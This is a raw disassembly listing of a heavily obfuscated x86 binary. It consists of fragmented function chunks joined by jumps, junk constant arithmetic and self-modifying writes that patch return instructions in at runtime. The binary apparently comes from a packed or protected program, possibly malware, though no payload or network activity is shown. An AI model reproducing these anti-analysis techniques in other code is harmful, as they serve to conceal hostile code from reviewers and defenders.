sub_43B1FD	proc near		; DATA XREF: sub_43EF4F:loc_45C564o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004402BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004463A1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A649 SIZE 0000000E BYTES

		push	ebx
		push	0D77E89FFh
		pop	ebx
		or	ebx, 0F59078F7h

loc_43B20A:				; CODE XREF: y2kk37jd:00459D69j
		jmp	loc_4463A1
sub_43B1FD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43B20F:				; CODE XREF: sub_449C4F-8280j
		pop	eax
		add	eax, 0C5835517h
		cmp	eax, 6E20506Fh
		jmp	loc_45BB77
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
		jl	loc_449193
		jmp	loc_446258
; ---------------------------------------------------------------------------

loc_43B22C:				; DATA XREF: sub_44AAA1+11188o
		push	eax
		call	sub_44F957
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_43B232:				; CODE XREF: sub_43F618:loc_4555FEj
		sub	edi, 0D52AF14Eh
		test	edi, 80000000h
		jmp	loc_455AD3
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45405E

loc_43B243:				; CODE XREF: sub_45405E:loc_454063j
		xor	ebx, 29E92326h
		and	ebx, 322CB531h
		add	ebx, 0CE17875Dh
		xchg	ebx, [esp+0]
		jmp	loc_457A06
; END OF FUNCTION CHUNK	FOR sub_45405E
; ---------------------------------------------------------------------------
		pushf
		cmp	edi, 8FD1466Ah
		jmp	loc_450A10
; ---------------------------------------------------------------------------
		add	ecx, edi
		jmp	loc_443830
; ---------------------------------------------------------------------------

loc_43B270:				; CODE XREF: y2kk37jd:loc_44E518j
					; y2kk37jd:0045C1DEj
		call	sub_43B276
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43B276	proc near		; CODE XREF: y2kk37jd:loc_43B270p
					; sub_44B814:loc_442403p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044DB70 SIZE 00000005 BYTES

		push	ebx
		push	ebp
		pop	ebx
		call	sub_43FDF2

loc_43B27E:				; CODE XREF: y2kk37jd:0043BB50j
					; y2kk37jd:004532A2p
		xchg	ebx, [esp+4+var_4]
		pop	ebx
		add	edi, 81E44566h
		xchg	edi, [esp+0]
		jmp	loc_44DB70
sub_43B276	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43B290:				; CODE XREF: sub_43F911:loc_457221j
		jge	loc_44F470

loc_43B296:				; CODE XREF: y2kk37jd:0045B303j
		jmp	loc_4414F9
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_43B29B:				; CODE XREF: sub_45136B+5E0Bj
		jmp	loc_43FADA
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43B2A0:				; CODE XREF: sub_4507BF+2C05j
					; y2kk37jd:0045BE02j
		jmp	loc_446600
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		shr	edi, 16h
		sbb	edi, 36E6A91Ah
		test	esi, ebx
		jmp	loc_43F410
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_43B2B5:				; CODE XREF: sub_44B814+ED86j
		jnp	loc_44EA85
		test	edx, ebp
		jmp	loc_453A6F
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43B2C2:				; CODE XREF: sub_43F8B8+1AEA5j
		add	edi, 80C690D3h
		jmp	loc_44B130
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_367. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B2CE:				; CODE XREF: y2kk37jd:0045531Cj
					; y2kk37jd:loc_4564B3j
		rol	edi, 0Dh
		add	edi, 5E144092h
		mov	[edi], eax
		pop	edi
		lea	eax, sub_45BBF8
		jmp	loc_448424
; ---------------------------------------------------------------------------
		popf
		jmp	loc_450D49

; =============== S U B	R O U T	I N E =======================================



sub_43B2EB	proc near		; CODE XREF: y2kk37jd:00440D96j
					; sub_44606C+D04Bp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043E760 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447637 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D809 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004512D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B9A6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045C6FB SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, loc_43E760
		mov	byte ptr [eax],	0C3h
		jmp	loc_4512D0
sub_43B2EB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43B2FD	proc near		; CODE XREF: sub_40B4CD+10Fp
					; sub_40B4CD+126p ...

; FUNCTION CHUNK AT 0043DB0C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004425AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044354D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455508 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456644 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A7ED SIZE 0000000A BYTES

		call	sub_44667E

loc_43B302:				; CODE XREF: sub_43DE8B+19D9Bj
		jmp	loc_44354D
sub_43B2FD	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_439. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43B308:				; CODE XREF: y2kk37jd:0045A26Fj
		jmp	loc_440B10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_43B30D:				; CODE XREF: sub_445787:loc_44450Bj
					; y2kk37jd:00444520j
		xor	edx, 0CF5609E0h
		add	edx, ebp
		add	edx, 8F5641CEh
		mov	[edx], eax
		jmp	loc_45675C
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456136

loc_43B322:				; CODE XREF: sub_456136+11j
		jnz	loc_453272
		jmp	loc_44572A
; END OF FUNCTION CHUNK	FOR sub_456136
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_43B32D:				; CODE XREF: sub_4591AE+18j
		push	19E476F5h
		pop	eax
		rol	eax, 15h
		add	eax, 77D9BCA5h
		add	eax, ebp
		jmp	loc_447074
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_43B343:				; CODE XREF: sub_451464:loc_441B6Ej
		or	ecx, ebp
		and	edx, eax
		jmp	loc_440E81
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
		dd 0C08F8A0Fh, 0C7F70001h, 0F6A5A884h, 1AAA8E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_43B35D:				; CODE XREF: sub_443BAF:loc_45251Fj
		sbb	edx, 0FB36CD5h
		jmp	loc_43D316
; END OF FUNCTION CHUNK	FOR sub_443BAF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_317. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447832

loc_43B369:				; CODE XREF: sub_447832+C7DCj
		jmp	loc_45BA80
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_43B36E:				; CODE XREF: sub_43DA43+1Bj
		jmp	loc_459BC8
; END OF FUNCTION CHUNK	FOR sub_43DA43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_43B373:				; CODE XREF: sub_43BAF2+Bj
		jmp	loc_450E07
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_43B378:				; CODE XREF: sub_43D8B6:loc_43B9DEj
		popf
		jmp	loc_450E8B
; END OF FUNCTION CHUNK	FOR sub_43D8B6

; =============== S U B	R O U T	I N E =======================================



sub_43B37E	proc near		; DATA XREF: sub_444A2B:loc_45B386o

; FUNCTION CHUNK AT 0043FFD4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447EB3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045252B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00457A9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A380 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BA68 SIZE 00000018 BYTES

		jno	loc_43FFD4
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_43F403
		mov	eax, [ebp+8]
		jmp	loc_447EB3
sub_43B37E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_43B399:				; CODE XREF: y2kk37jd:004480C0j
		retn
; ---------------------------------------------------------------------------

loc_43B39A:				; CODE XREF: y2kk37jd:00457B75j
		jmp	nullsub_466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_43B39F:				; CODE XREF: sub_44113A:loc_44D4EFj
		jmp	loc_45521A
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_43B3A4:				; CODE XREF: y2kk37jd:loc_457E41j
		or	ecx, ds:4000EEh
		add	ecx, 2198DB20h
		mov	[ecx], eax
		xchg	eax, [esp]
		mov	ecx, eax
		pop	eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4521FC

loc_43B3B9:				; CODE XREF: sub_4521FC+Bj
		jmp	loc_45037F
; END OF FUNCTION CHUNK	FOR sub_4521FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_43B3BE:				; CODE XREF: sub_44023C+F43Cj
		jmp	loc_44A78D
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_43B3C3:				; CODE XREF: sub_43F2F2+411j
		jmp	loc_43CAA1
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------

loc_43B3C8:				; CODE XREF: y2kk37jd:00448463j
		rol	eax, 1Ch
		jmp	loc_45C70A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_43B3D0:				; CODE XREF: sub_459672:loc_44582Bj
		add	ebx, edx
		or	ecx, edx
		add	ebx, 0BD2F214Bh
		pop	edx
		pop	ecx
		pop	eax
		pop	ebx
		xchg	ebx, [esp-10h+arg_C]
		jmp	loc_45AE34
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------

loc_43B3E6:				; CODE XREF: y2kk37jd:00443C0Cj
		xchg	edx, esi

loc_43B3E8:				; CODE XREF: y2kk37jd:00443BFAj
		xor	ecx, 0FFBE8615h
		rol	ecx, 12h
		call	sub_443E16
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_43B3F6:				; CODE XREF: sub_44D8CE+DB86j
		jmp	loc_4550B8
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458520

loc_43B3FB:				; CODE XREF: sub_458520:loc_4455E0j
					; y2kk37jd:0044F4D3j
		and	edi, 8EF25322h
		add	edi, 0FD544F2Eh
		call	sub_43F97C
		jmp	loc_45B1C3
; END OF FUNCTION CHUNK	FOR sub_458520
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_43B411:				; CODE XREF: sub_446861:loc_43B695j
		push	eax
		mov	eax, [ebp-18h]
		shl	eax, 2
		cdq
		jz	loc_4449EF
		add	eax, [esp+4+var_4]
		jmp	loc_44C312
; END OF FUNCTION CHUNK	FOR sub_446861

; =============== S U B	R O U T	I N E =======================================



sub_43B427	proc near		; DATA XREF: y2kk37jd:00459668o

; FUNCTION CHUNK AT 0043ECC4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004513F4 SIZE 00000015 BYTES

		push	0C93DDA7Bh
		pop	edx
		sub	edx, 56C08B59h
		rol	edx, 1Fh
		and	edx, 92C448C1h
		rol	edx, 0Ch
		jmp	loc_43ECC4
sub_43B427	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B444:				; DATA XREF: sub_453969-166F7o
		mov	eax, [eax]
		mov	al, [eax]
		js	loc_4402E2
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_44639C
; ---------------------------------------------------------------------------
		rol	ecx, 12h
		jmp	sub_45B135
; ---------------------------------------------------------------------------
		mov	ds:off_41E1EC, eax
		lea	eax, loc_456839
		mov	byte ptr [eax],	0C3h
		jmp	loc_456839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_43B474:				; CODE XREF: sub_43BD3D:loc_456839j
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		mov	eax, [esp-4+arg_0]
		jmp	loc_452BFC
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		push	0FFFFFFB3h
		add	[eax], eax

; =============== S U B	R O U T	I N E =======================================



sub_43B488	proc near		; CODE XREF: sub_44EDF8-6B05p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044F907 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AE44 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 5FE36D9Eh
		jmp	loc_45AE44
sub_43B488	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43B497:				; CODE XREF: sub_4411C3:loc_442441j
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		jmp	loc_44E986
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_43B4A5	proc near		; CODE XREF: sub_44291B+751Fp
					; y2kk37jd:0045BA46j

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		add	esi, 504C2B31h
		xchg	esi, [esp-4+arg_0]
		jmp	sub_45405E
sub_43B4A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_43B4B7:				; CODE XREF: sub_43C054+7j
		xchg	ebx, [esp+0]

loc_43B4BA:				; CODE XREF: y2kk37jd:loc_4531B5j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_446628, 0
		jmp	loc_442860
; END OF FUNCTION CHUNK	FOR sub_43C054

; =============== S U B	R O U T	I N E =======================================



sub_43B4CB	proc near		; CODE XREF: sub_451464-105D8p
					; y2kk37jd:00457DEEj
		xchg	esi, [esp+0]
		pop	esi
		mov	edx, 20413B0Fh
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+0]
		call	sub_45AD8D

loc_43B4DF:				; CODE XREF: sub_43BD0D+1F794j
		jmp	sub_4487FD
sub_43B4CB	endp

; ---------------------------------------------------------------------------
		mov	edx, [ebp-18h]
		mov	[edx], eax
		jmp	loc_4415B3

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43B4EE	proc near		; CODE XREF: sub_445226+4B03j

; FUNCTION CHUNK AT 0043EC5A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F11F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F5B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F52B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045344E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004587A0 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_43F11F
sub_43B4EE	endp


; =============== S U B	R O U T	I N E =======================================



sub_43B4F9	proc near		; DATA XREF: sub_445226+2B8o

; FUNCTION CHUNK AT 0044735D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B3DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B77E SIZE 0000001B BYTES

		xchg	ebp, [esp+0]

loc_43B4FC:				; CODE XREF: y2kk37jd:loc_43FCB4j
		mov	eax, ebp
		pop	ebp
		xor	eax, 1BF4228Ch
		js	loc_45B77E

loc_43B50B:				; CODE XREF: y2kk37jd:0043E95Ej
		jmp	nullsub_307
sub_43B4F9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	esi, 0C1B5B6A7h
		jmp	loc_45B77C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43B51A:				; CODE XREF: sub_43F8B8+1B917j
		test	ebx, ecx
		jmp	loc_454035
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_43B521:				; CODE XREF: y2kk37jd:00453F74j
		ror	edx, 0Fh
		not	eax
		cmp	eax, 5C1AE520h
		jmp	loc_45BCDA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_43B531:				; CODE XREF: sub_43B0F5:loc_44FB17j
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_43B53B:				; CODE XREF: sub_458FC0-206Bj
		jmp	loc_440C89
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------

loc_43B540:				; CODE XREF: y2kk37jd:004533D1j
		jbe	loc_43C3A2
		cmp	ebx, 9F088FD1h
		jmp	loc_446966
; ---------------------------------------------------------------------------

loc_43B551:				; DATA XREF: y2kk37jd:0043C6CCo
		xor	ecx, edx
		shl	eax, 1Ch
		and	eax, ebx
		jnz	loc_442C5A
		adc	edx, 0E9CDE8C0h
		jmp	loc_45A82B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459035

loc_43B569:				; CODE XREF: sub_459035+Fj
		mov	[ebp+var_8], edx
		mov	[ebp+var_4], eax
		xor	eax, eax
		mov	[ebp+var_C], eax
		cmp	[ebp+var_4], 0
		push	offset sub_4585B4
		jmp	loc_44E672
; END OF FUNCTION CHUNK	FOR sub_459035

; =============== S U B	R O U T	I N E =======================================



sub_43B582	proc near		; CODE XREF: sub_445226:loc_44890Dj
		push	ebp
sub_43B582	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43B583:				; CODE XREF: sub_43F75D-97j
		js	loc_44C70F
		add	ecx, esi
		jmp	loc_441AD2
; END OF FUNCTION CHUNK	FOR sub_43F75D

; =============== S U B	R O U T	I N E =======================================



sub_43B590	proc near		; DATA XREF: sub_43ED86+14C34o
		ror	eax, 14h
		sub	eax, 6DC3A957h
		push	ebx
		call	sub_448AAA
sub_43B590	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_43B59F:				; CODE XREF: sub_43B8D6+13399j
		jmp	loc_44725F
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBC7

loc_43B5A4:				; CODE XREF: sub_44DBC7+Dj
		jmp	sub_4599BE
; END OF FUNCTION CHUNK	FOR sub_44DBC7
; ---------------------------------------------------------------------------

loc_43B5A9:				; CODE XREF: y2kk37jd:0043E8C2j
		jz	loc_4587F0

; =============== S U B	R O U T	I N E =======================================



sub_43B5AF	proc near		; CODE XREF: y2kk37jd:004413AFp

; FUNCTION CHUNK AT 0043C558 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044463B SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ecx
		push	ebp
		jmp	loc_44463B
sub_43B5AF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_43B5BA:				; CODE XREF: y2kk37jd:loc_45B9E9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43B5BB:				; CODE XREF: sub_449C4F+51E2j
		jl	loc_43E784

loc_43B5C1:				; CODE XREF: sub_443360+156BDj
		jmp	loc_43F0CF
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------

loc_43B5C6:				; CODE XREF: y2kk37jd:0044E948j
		jmp	locret_44CA72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_43B5CB:				; CODE XREF: sub_45136B-30FBj
		jmp	loc_4442B4
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43B5D0:				; CODE XREF: sub_4411C3+634Ej
		jmp	loc_4406EC
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		mov	ebx, [edi]
		jmp	loc_442F13
; ---------------------------------------------------------------------------
		dd 18098A0Fh, 879D0000h, 685E2434h, 0AC8C71BBh,	8512E95Ah
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_43B5F2:				; CODE XREF: sub_44001E:loc_44D9A7j
		add	eax, 59E8485h
		push	eax
		call	sub_4476EE
		push	edx
		push	64601776h
		jmp	loc_4416B0
; END OF FUNCTION CHUNK	FOR sub_44001E

; =============== S U B	R O U T	I N E =======================================



sub_43B609	proc near		; DATA XREF: y2kk37jd:0043BAE8o
		mov	byte ptr [eax],	0C3h
		jmp	loc_442350
sub_43B609	endp

; ---------------------------------------------------------------------------

loc_43B611:				; CODE XREF: y2kk37jd:00444EEEj
		mov	eax, [esp]
		push	edx
		push	esi
		push	809233CDh
		pop	esi
		and	esi, ds:4000EFh
		rol	esi, 4
		jmp	loc_43C7F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_304. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44635E

loc_43B62B:				; CODE XREF: sub_44635E+8j
		jmp	nullsub_259
; END OF FUNCTION CHUNK	FOR sub_44635E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_43B630:				; CODE XREF: sub_44113A+521Fj
		jmp	loc_448BC6
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_43B635:				; CODE XREF: sub_44DED9+CF6j
		and	edx, 161E2E99h
		jmp	loc_4482F8
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_43B640:				; CODE XREF: sub_44B924:loc_4493E2j
		jmp	loc_45474F
; ---------------------------------------------------------------------------

loc_43B645:				; CODE XREF: sub_44B924+6j
					; sub_44B924+14j
		jns	loc_43E26C

loc_43B64B:				; CODE XREF: sub_43C851:loc_43D836j
		mov	eax, [ebp-4]
		call	sub_444DF4
		test	al, al
		jnz	loc_456D49
		jmp	loc_44F012
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_43B660:				; CODE XREF: sub_44A33C+95B8j
		xor	ecx, 0ABCACF4Ch

loc_43B666:				; CODE XREF: sub_44A33C:loc_4538DCj
		or	ebx, 0DEC7BE38h
		xor	ebx, 9DC2D20Bh
		xor	eax, ebx
		pop	ebx
		jmp	loc_44C6DC
; END OF FUNCTION CHUNK	FOR sub_44A33C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_43B67B:				; CODE XREF: y2kk37jd:004492B9j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43B67C	proc near		; CODE XREF: sub_454C24:loc_444701p
					; y2kk37jd:00457ABBj
		xchg	esi, [esp+0]
		pop	esi
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		call	sub_443831

locret_43B68A:				; CODE XREF: y2kk37jd:0045C06Aj
		retn
sub_43B67C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_43B68B:				; CODE XREF: sub_43BA66+1E684j
		jmp	loc_441E83
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43B690:				; CODE XREF: sub_4507BF-ED79j
		jmp	nullsub_69
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_43B695:				; CODE XREF: sub_446861-59A4j
		jmp	loc_43B411
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449129

loc_43B69A:				; CODE XREF: sub_449129+13j
		mov	dword ptr [eax], 70736957h
		lea	eax, [ebp-1Ch]
		mov	dword ptr [eax], 646E6957h
		lea	eax, [ebp-18h]
		jmp	loc_44A0A5
; END OF FUNCTION CHUNK	FOR sub_449129
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43B6B1:				; CODE XREF: sub_445226:loc_44537Bj
		add	eax, edi

loc_43B6B3:				; CODE XREF: sub_445226:loc_445373j
		xor	eax, 18DEF4C4h
		push	offset sub_448700
		jmp	nullsub_41
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_43B6C3:				; CODE XREF: sub_457524+Aj
		jnz	loc_43E470
		jmp	loc_450246
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------

loc_43B6CE:				; CODE XREF: y2kk37jd:loc_458430j
		push	esi
		push	0D8E9CBF9h
		pop	esi
		add	esi, 2B3B7499h
		or	esi, 0DAC2B8B7h
		jmp	loc_44F75F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_43B6E6:				; CODE XREF: sub_44EC21-87B2j
		mov	edx, 3BE71634h
		xchg	edx, [eax]
		jmp	loc_43BA82
; END OF FUNCTION CHUNK	FOR sub_44EC21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43B6F2:				; CODE XREF: sub_453867-7E99j
		jnz	loc_43EA7B
		jmp	loc_43DB9E
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_43B6FD:				; CODE XREF: sub_448700+C819j
		pop	edi

loc_43B6FE:				; CODE XREF: sub_448700:loc_43E79Aj
		or	edx, ds:4000E8h
		xor	edx, 22976A15h
		sub	edx, 0BF4A0D45h
		xor	edx, 722C8A13h
		add	edx, ebp
		add	edx, 4439C9CAh

loc_43B71E:				; CODE XREF: y2kk37jd:00458E8Ej
		mov	[edx], eax
		jmp	loc_457D71
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------

loc_43B725:				; CODE XREF: y2kk37jd:loc_4438A1j
		mov	edi, ecx
		xchg	edi, [esp]
		push	0A175383Dh
		pop	ecx
		jmp	loc_447447
; ---------------------------------------------------------------------------

loc_43B735:				; CODE XREF: y2kk37jd:0044E7D0j
		jb	loc_45478D
		pushf
		jmp	loc_45444B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_43B741:				; CODE XREF: sub_441AAB+1463j
		pushf
		jmp	loc_43F7D5
; END OF FUNCTION CHUNK	FOR sub_441AAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_43B747:				; CODE XREF: sub_4438B1-1248j
					; sub_4438B1:loc_456967j
		adc	eax, edi
		jmp	loc_44E58D
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EAA8

loc_43B74E:				; CODE XREF: sub_43EAA8+5F7Ej
					; sub_43EAA8:loc_44DF12j
		push	0EF37CF8Ah
		pop	eax
		xor	eax, ds:4000EAh
		test	eax, 20000h
		jmp	loc_452094
; END OF FUNCTION CHUNK	FOR sub_43EAA8

; =============== S U B	R O U T	I N E =======================================



sub_43B765	proc near		; CODE XREF: sub_43F770:loc_45B503j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C58F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043E08A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044048E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044080A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440C0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441BB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004469E4 SIZE 00000015 BYTES
